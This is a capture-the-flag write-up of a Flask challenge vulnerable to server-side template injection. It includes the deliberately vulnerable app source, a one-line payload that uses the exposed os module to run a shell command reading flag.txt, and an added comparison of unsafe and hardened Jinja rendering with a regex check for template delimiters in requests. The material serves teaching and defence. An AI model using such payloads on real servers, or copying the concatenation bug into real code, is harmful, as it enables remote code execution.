mr-template-man
SRC: https://library.m0unt41n.ch/challenges/mr-template-man
XSS injection and RCE via insecure template functionality. The os module is placed in the template context, and user content is concatenated straight into the template source; the content XSS therefore becomes fully abusable RCE.
With {{ }} we can inject template expressions and then abuse the os wrapper.
Final payload: {{ os.popen("cat flag.txt").read() }}
Python:
import os
from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route("/", methods=["GET"])
def index():
    # user-controlled "content" is concatenated into the template *source*
    content = request.args.get("content") or ""
    # the real os module is handed to the template context
    ctx = {
        "os": os
    }
    try:
        return render_template_string("""
<p>""" + content + """</p>
<span>Server running as pid {{ os.getpid() }}</span>
""", **ctx)
    except Exception as e:
        return render_template_string("""<!DOCTYPE html><html></html>""", ex=str(e))

if __name__ == "__main__":
    app.run()
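As an added example (not the challenge's code), here is the same page rendered two ways with plain Jinja2: the concatenation bug from the app above next to a hardened version that passes the content as a template variable and no longer hands the os module to the template, plus a small detection check usable on request logs. It assumes jinja2 is installed; the pid value is only illustrative.

```python
import os
import re
from jinja2 import Environment

# Hardened template: a developer-written constant. User data is a *value*
# rendered into it, never part of the template source.
SAFE_TEMPLATE = "<p>{{ content }}</p><span>Server running as pid {{ pid }}</span>"


def render_unsafe(content: str) -> str:
    """Mirrors the challenge's bug: user input is concatenated into the
    template source, so any {{ ... }} in it is parsed and evaluated."""
    source = "<p>" + content + "</p><span>Server running as pid {{ pid }}</span>"
    env = Environment(autoescape=True)
    # autoescape protects against HTML injection of *values*, but does nothing
    # here because the injected text is template code, not a value
    return env.from_string(source).render(pid=os.getpid())


def render_safe(content: str) -> str:
    """Hardened form: the template is constant and the user input is a
    variable, so Jinja prints it as data (HTML-escaped) and never parses it.
    The context exposes only the values the page needs, not the os module."""
    env = Environment(autoescape=True)
    return env.from_string(SAFE_TEMPLATE).render(content=content, pid=os.getpid())


# Jinja delimiters almost never appear in legitimate page content, so their
# presence in a query parameter is a cheap signal for logs or a WAF rule.
TEMPLATE_DELIMITERS = re.compile(r"\{\{|\{%|\{#")


def looks_like_template_injection(value: str) -> bool:
    """True when a request value contains Jinja expression/statement delimiters."""
    return TEMPLATE_DELIMITERS.search(value) is not None


if __name__ == "__main__":
    probe = "{{ 7*7 }}"          # classic harmless SSTI probe (constructed)
    print("unsafe:", render_unsafe(probe))   # expression is evaluated -> 49
    print("safe:  ", render_safe(probe))     # printed literally as text
    print("flagged:", looks_like_template_injection(probe))
```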